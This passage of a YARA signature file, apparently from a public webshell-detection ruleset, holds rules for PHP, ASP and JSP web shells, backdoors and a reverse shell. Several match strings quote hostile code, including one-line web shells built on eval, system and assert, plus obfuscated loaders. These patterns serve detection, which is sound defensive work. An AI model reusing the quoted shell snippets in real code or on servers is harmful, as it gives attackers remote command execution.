   		$s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword   
   		$s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword   
   		$s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword   
   	condition:   
   		2 of them   
rule webshell_asp_ice {   
   	meta:   
   		description = "Web Shell - file ice.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "d141e011a92f48da72728c35f1934a2b"   
   	strings:   
   		$s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC"   
   	condition:   
   		all of them   
rule WebShell_C99madShell_v__2_0_madnet_edition {   
   	meta:   
   		description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php"   
   		author = "Florian Roth"   
   		hash = "f99f8228eb12746847f54bad45084f19d1a7e111"   
   	strings:   
   		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword   
   		$s1 = "eval(gzinflate(base64_decode('"   
   		$s2 = "$pass = \"\";  //Pass" fullword   
   		$s3 = "$login = \"\"; //Login" fullword   
   		$s4 = "//Authentication" fullword   
   	condition:   
   		all of them   
rule Webshell_zehir {   
   	meta:   
   		description = "Detects Webshell - rule generated from from files elmaliseker.asp, zehir.asp, zehir.txt, zehir4.asp, zehir4.txt"   
   		author = "Florian Roth"   
   		reference = "https://github.com/nikicat/web-malware-collection"   
   		date = "2016-01-11"   
   		score = 70   
   		hash1 = "16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218"   
   		hash2 = "0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6"   
   		hash3 = "cb9d5427a83a0fc887e49f07f20849985bd2c3850f272ae1e059a08ac411ff66"   
   		hash4 = "b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d"   
   		hash5 = "febf37a9e8ba8ece863f506ae32ad398115106cc849a9954cbc0277474cdba5c"   
   	strings:   
   		$s1 = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii   
   		$s2 = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii   
   	condition:   
   		filesize < 200KB and 1 of them   
rule byshell063_ntboot {   
   	meta:   
   		description = "Webshells Auto-generated - file ntboot.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c"   
   	strings:   
   		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtBoot"   
   		$s1 = "Failure ... Access is Denied !"   
   		$s2 = "Dumping Description to Registry..."   
   		$s3 = "Opening Service .... Failure !"   
   	condition:   
   		all of them   
rule small_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file small.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "fcee6226d09d150bfa5f103bee61fbde"   
   	strings:   
   		$s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword   
   		$s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"   
   		$s4 = "@ini_set('error_log',NULL);" fullword   
   	condition:   
   		2 of them   
rule webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx {   
   	meta:   
   		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "0b19e9de790cd2f4325f8c24b22af540"   
   		hash1 = "4745d510fed4378e4b1730f56f25e569"   
   		hash2 = "f3ca29b7999643507081caab926e2e74"   
   		hash3 = "46a18979750fa458a04343cf58faa9bd"   
   	strings:   
   		$s3 = "BODY, TD, TR {" fullword   
   		$s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword   
   		$s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword   
   	condition:   
   		2 of them   
rule connectback2_pl {   
   	meta:   
   		description = "Semi-Auto-generated  - file connectback2.pl.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "473b7d226ea6ebaacc24504bd740822e"   
   	strings:   
   		$s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   "   
   		$s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"   
   		$s2 = "ConnectBack Backdoor"   
   	condition:   
   		1 of them   
rule WebShell_qsd_php_backdoor {   
   	meta:   
   		description = "PHP Webshells Github Archive - file qsd-php-backdoor.php"   
   		author = "Florian Roth"   
   		hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f"   
   	strings:   
   		$s1 = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c"   
   		$s2 = "if(isset($_POST[\"newcontent\"]))" fullword   
   		$s3 = "foreach($parts as $val)//Assemble the path back together" fullword   
   		$s7 = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword   
   	condition:   
   		2 of them   
rule s72_Shell_v1_1_Coding_html {   
   	meta:   
   		description = "Semi-Auto-generated  - file s72 Shell v1.1 Coding.html.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "c2e8346a5515c81797af36e7e4a3828e"   
   	strings:   
   		$s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"   
   		$s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"   
   		$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\""   
   	condition:   
   		1 of them   
rule JSP_jfigueiredo_APT_webshell {   
   	meta:   
   		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"   
   		author = "F.Roth"   
   		date = "12.10.2014"   
   		score = 60   
   		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"   
   	strings:   
   		$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii   
   		$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii   
   	condition:   
   		all of them   
rule WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"   
   		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"   
   		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"   
   	strings:   
   		$s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</"   
   		$s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh"   
   		$s11 = " *   Coded by Pixcher" fullword   
   		$s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword   
   	condition:   
   		2 of them   
rule sendmail {   
   	meta:   
   		description = "Webshells Auto-generated - file sendmail.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "75b86f4a21d8adefaf34b3a94629bd17"   
   	strings:   
   		$s3 = "_NextPyC808"   
   		$s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)"   
   	condition:   
   		all of them   
rule sql_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file sql.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "8334249cbb969f2d33d678fec2b680c5"   
   	strings:   
   		$s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#"   
   		$s2 = "http://rst.void.ru"   
   		$s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"   
   	condition:   
   		1 of them   
rule webshell_asp_1d {   
   	meta:   
   		description = "Web Shell - file 1d.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "fad7504ca8a55d4453e552621f81563c"   
   	strings:   
   		$s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO"   
   	condition:   
   		all of them   
rule webshell_PHP_b37 {   
   	meta:   
   		description = "Web Shell - file b37.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "0421445303cfd0ec6bc20b3846e30ff0"   
   	strings:   
   		$s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc"   
   	condition:   
   		all of them   
rule HYTop_AppPack_2005 {   
   	meta:   
   		description = "Webshells Auto-generated - file 2005.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"   
   	strings:   
   		$s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb"   
   	condition:   
   		all of them   
rule WebShell_ironshell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file ironshell.php"   
   		author = "Florian Roth"   
   		hash = "d47b8ba98ea8061404defc6b3a30839c4444a262"   
   	strings:   
   		$s0 = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword   
   		$s2 = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST"   
   		$s4 = "error_reporting(0); //If there is an error, we'll show it, k?" fullword   
   		$s8 = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d"   
   		$s15 = "if(!is_numeric($_POST['timelimit']))" fullword   
   		$s16 = "if($_POST['chars'] == \"9999\")" fullword   
   		$s17 = "<option value=\\\"az\\\">a - zzzzz</option>" fullword   
   		$s18 = "print shell_exec($command);" fullword   
   	condition:   
   		3 of them   
rule WebShell_STNC_WebShell_v0_8 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"   
   		author = "Florian Roth"   
   		hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc"   
   	strings:   
   		$s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword   
   		$s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()"   
   		$s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw"   
   	condition:   
   		2 of them   
rule WebShell_dC3_Security_Crew_Shell_PRiV {   
   	meta:   
   		description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"   
   		author = "Florian Roth"   
   		hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a"   
   	strings:   
   		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword   
   		$s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword   
   		$s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword   
   		$s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword   
   		$s16 = "echo base64_decode($images[$_GET['pic']]);" fullword   
   		$s20 = "if (isset($_GET['rename_all'])) {" fullword   
   	condition:   
   		3 of them   
rule webshell_PHP_g00nv13 {   
   	meta:   
   		description = "Web Shell - file g00nv13.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "35ad2533192fe8a1a76c3276140db820"   
   	strings:   
   		$s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas"   
   		$s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p"   
   	condition:   
   		all of them   
rule webshell_webshells_new_php2 {   
   	meta:   
   		description = "Web shells - generated from file php2.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "fbf2e76e6f897f6f42b896c855069276"   
   	strings:   
   		$s0 = "<?php $s=@$_GET[2];if(md5($s.$s)=="   
   	condition:   
   		all of them   
rule webshell_webshells_new_PHP {   
   	meta:   
   		description = "Web shells - generated from file PHP.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "a524e7ae8d71e37d2fd3e5fbdab405ea"   
   	strings:   
   		$s1 = "echo \"<font color=blue>Error!</font>\";" fullword   
   		$s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE"   
   		$s5 = " - ExpDoor.com</title>" fullword   
   		$s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword   
   		$s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword   
   	condition:   
   		1 of them   
rule Java_Shell_js {   
   	meta:   
   		description = "Semi-Auto-generated  - file Java Shell.js.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "36403bc776eb12e8b7cc0eb47c8aac83"   
   	strings:   
   		$s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword   
   		$s3 = "public class JythonShell extends JPanel implements Runnable {" fullword   
   		$s4 = "public static int DEFAULT_SCROLLBACK = 100"   
   	condition:   
   		2 of them   
rule FSO_s_RemExp {   
   	meta:   
   		description = "Webshells Auto-generated - file RemExp.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b69670ecdbb40012c73686cd22696eeb"   
   	strings:   
   		$s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser"   
   		$s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F"   
   		$s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></"   
   	condition:   
   		all of them   
rule HDConfig {   
   	meta:   
   		description = "Webshells Auto-generated - file HDConfig.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "7d60e552fdca57642fd30462416347bd"   
   	strings:   
   		$s0 = "An encryption key is derived from the password hash. "   
   		$s3 = "A hash object has been created. "   
   		$s4 = "Error during CryptCreateHash!"   
   		$s5 = "A new key container has been created."   
   		$s6 = "The password has been added to the hash. "   
   	condition:   
   		all of them   
rule FeliksPack3___PHP_Shells_ssh {   
   	meta:   
   		description = "Webshells Auto-generated - file ssh.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "1aa5307790d72941589079989b4f900e"   
   	strings:   
   		$s0 = "eval(gzinflate(str_rot13(base64_decode('"   
   	condition:   
   		all of them   
rule elmaliseker {   
   	meta:   
   		description = "Webshells Auto-generated - file elmaliseker.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "ccf48af0c8c09bbd038e610a49c9862e"   
   	strings:   
   		$s0 = "javascript:Command('Download'"   
   		$s5 = "zombie_array=array("   
   	condition:   
   		all of them   
rule ru24_post_sh_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file ru24_post_sh.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "5b334d494564393f419af745dc1eeec7"   
   	strings:   
   		$s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword   
   		$s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"   
   		$s4 = "Writed by DreAmeRz" fullword   
   	condition:   
   		1 of them   
rule FSO_s_phpinj_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file phpinj.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "dd39d17e9baca0363cc1c3664e608929"   
   	strings:   
   		$s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"   
   	condition:   
   		all of them   
rule multiple_webshells_0004 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SpecialShell_99_php_php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "3ca5886cd54d495dc95793579611f59a"   
   		hash2 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash3 = "09609851caa129e40b0d56e90dfc476c"   
   	strings:   
   		$s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft"   
   		$s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r"   
   	condition:   
   		1 of them   
rule webshell_807_a_css_dm_he1p_JspSpy_xxx {   
   	meta:   
   		description = "Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"   
   		hash1 = "76037ebd781ad0eac363d56fc81f4b4f"   
   		hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"   
   		hash3 = "14e9688c86b454ed48171a9d4f48ace8"   
   		hash4 = "b330a6c2d49124ef0729539761d6ef0b"   
   		hash5 = "d71716df5042880ef84427acee8b121e"   
   		hash6 = "341298482cf90febebb8616426080d1d"   
   		hash7 = "29aebe333d6332f0ebc2258def94d57e"   
   		hash8 = "42654af68e5d4ea217e6ece5389eb302"   
   		hash9 = "88fc87e7c58249a398efd5ceae636073"   
   		hash10 = "4a812678308475c64132a9b56254edbc"   
   		hash11 = "9626eef1a8b9b8d773a3b2af09306a10"   
   		hash12 = "344f9073576a066142b2023629539ebd"   
   		hash13 = "32dea47d9c13f9000c4c807561341bee"   
   		hash14 = "b9744f6876919c46a29ea05b1d95b1c3"   
   		hash15 = "6acc82544be056580c3a1caaa4999956"   
   		hash16 = "6aa32a6392840e161a018f3907a86968"   
   		hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c"   
   		hash18 = "3ea688e3439a1f56b16694667938316d"   
   		hash19 = "ab77e4d1006259d7cbc15884416ca88c"   
   		hash20 = "71097537a91fac6b01f46f66ee2d7749"   
   		hash21 = "2434a7a07cb47ce25b41d30bc291cacc"   
   		hash22 = "7a4b090619ecce6f7bd838fe5c58554b"   
   	strings:   
   		$s1 = "\"<h2>Remote Control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var"   
   		$s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu"   
   		$s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i"   
   	condition:   
   		all of them   
rule multiple_webshells_0030 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_1_SpecialShell_99_php_php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "3ca5886cd54d495dc95793579611f59a"   
   		hash2 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash3 = "44542e5c3e9790815c49d5f9beffbbf2"   
   		hash4 = "09609851caa129e40b0d56e90dfc476c"   
   	strings:   
   		$s0 = "if ($total === FALSE) {$total = 0;}" fullword   
   		$s1 = "$free_percent = round(100/($total/$free),2);" fullword   
   		$s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword   
   		$s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword   
   	condition:   
   		2 of them   
rule webshell_webshells_new_xxx {   
   	meta:   
   		description = "Web shells - generated from file xxx.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "0e71428fe68b39b70adb6aeedf260ca0"   
   	strings:   
   		$s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword   
   	condition:   
   		all of them   
rule webshell_webshells_new_code {   
   	meta:   
   		description = "Web shells - generated from file code.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "a444014c134ff24c0be5a05c02b81a79"   
   	strings:   
   		$s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi"   
   		$s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO"   
   		$s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_"   
   		$s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:"   
   		$s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm"   
   	condition:   
   		1 of them   
rule webshell_C99madShell_v_3_0_smowu {   
   	meta:   
   		description = "Web Shell - file smowu.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "74e1e7c7a6798f1663efb42882b85bee"   
   	strings:   
   		$s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for"   
   		$s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty"   
   	condition:   
   		1 of them   
rule webshell_2008_2009lite_2009mssql {   
   	meta:   
   		description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"   
   		hash1 = "3f4d454d27ecc0013e783ed921eeecde"   
   		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"   
   	strings:   
   		$s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');"   
   		$s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all"   
   	condition:   
   		all of them   
rule webshell_bypass_iisuser_p {   
   	meta:   
   		description = "Web shells - generated from file bypass-iisuser-p.asp"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "924d294400a64fa888a79316fb3ccd90"   
   	strings:   
   		$s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject"   
   	condition:   
   		all of them   
rule webshell_php_s_u {   
   	meta:   
   		description = "Web Shell - file s-u.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "efc7ba1a4023bcf40f5e912f1dd85b5a"   
   	strings:   
   		$s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea"   
   	condition:   
   		all of them   
rule WebShell_zehir4_asp_php {   
   	meta:   
   		description = "PHP Webshells Github Archive - file zehir4.asp.php.txt"   
   		author = "Florian Roth"   
   		hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157"   
   	strings:   
   		$s4 = "response.Write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&"   
   		$s11 = "frames.byZehir.document.execCommand("   
   		$s15 = "frames.byZehir.document.execCommand(co"   
   	condition:   
   		2 of them   
rule hxdef100 {   
   	meta:   
   		description = "Webshells Auto-generated - file hxdef100.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "55cc1769cef44910bd91b7b73dee1f6c"   
   	strings:   
   		$s0 = "RtlAnsiStringToUnicodeString"   
   		$s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"   
   		$s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"   
   	condition:   
   		all of them   
rule FeliksPack3___PHP_Shells_phpft {   
   	meta:   
   		description = "Webshells Auto-generated - file phpft.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "60ef80175fcc6a879ca57c54226646b1"   
   	strings:   
   		$s6 = "PHP Files Thief"   
   		$s11 = "http://www.4ngel.net"   
   	condition:   
   		all of them   
rule hkshell_hkrmv {   
   	meta:   
   		description = "Webshells Auto-generated - file hkrmv.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "bd3a0b7a6b5536f8d96f50956560e9bf"   
   	strings:   
   		$s5 = "/THUMBPOSITION7"   
   		$s6 = "\\EvilBlade\\"   
   	condition:   
   		all of them   
rule WebShell_mysql_tool {   
   	meta:   
   		description = "PHP Webshells Github Archive - file mysql_tool.php"   
   		author = "Florian Roth"   
   		hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474"   
   	strings:   
   		$s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword   
   		$s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword   
   	condition:   
   		2 of them   
rule webshell_asp_up {   
   	meta:   
   		description = "Web Shell - file up.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "f775e721cfe85019fe41c34f47c0d67c"   
   	strings:   
   		$s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio"   
   		$s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword   
   	condition:   
   		1 of them   
rule bdcli100 {   
   	meta:   
   		description = "Webshells Auto-generated - file bdcli100.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b12163ac53789fb4f62e4f17a8c2e028"   
   	strings:   
   		$s5 = "unable to connect to "   
   		$s8 = "backdoor is corrupted on "   
   	condition:   
   		all of them   
rule multiple_webshells_0012 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_spy_php_php_s_php_php"   
   		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"   
   		hash1 = "911195a9b7c010f61b66439d9048f400"   
   		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"   
   		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"   
   		hash4 = "817671e1bdc85e04cc3440bbd9288800"   
   	strings:   
   		$s0 = "echo sr(15,\"<b>\".$lang[$language.'_text"   
   		$s1 = ".$arrow.\"</b>\",in('text','"   
   	condition:   
   		2 of them   
rule multiple_webshells_0008 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php_ctt_sh_php_php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "3ca5886cd54d495dc95793579611f59a"   
   		hash2 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"   
   		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"   
   		hash5 = "09609851caa129e40b0d56e90dfc476c"   
   		hash6 = "671cad517edd254352fe7e0c7c981c39"   
   	strings:   
   		$s0 = "  if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\""   
   		$s1 = "  if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile"   
   		$s2 = "  echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr"   
   		$s3 = "  elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m"   
   	condition:   
   		all of them   
rule php_reverse_shell : webshell {   
   	meta:   
   		description = "Laudanum Injector Tools - file php-reverse-shell.php"   
   		author = "Florian Roth"   
   		reference = "http://laudanum.inguardians.com/"   
   		date = "2015-06-22"   
   		hash = "3ef03bbe3649535a03315dcfc1a1208a09cea49d"   
   	strings:   
   		$s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii /* PEStudio Blacklist: strings */   
   		$s2 = "printit(\"Successfully opened reverse shell to $ip:$port\");" fullword ascii /* PEStudio Blacklist: strings */   
   		$s3 = "$input = fread($pipes[1], $chunk_size);" fullword ascii /* PEStudio Blacklist: strings */   
   	condition:   
   		filesize < 15KB and all of them   
rule webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 {   
   	meta:   
   		description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "b330a6c2d49124ef0729539761d6ef0b"   
   		hash1 = "d71716df5042880ef84427acee8b121e"   
   		hash2 = "344f9073576a066142b2023629539ebd"   
   		hash3 = "32dea47d9c13f9000c4c807561341bee"   
   		hash4 = "b9744f6876919c46a29ea05b1d95b1c3"   
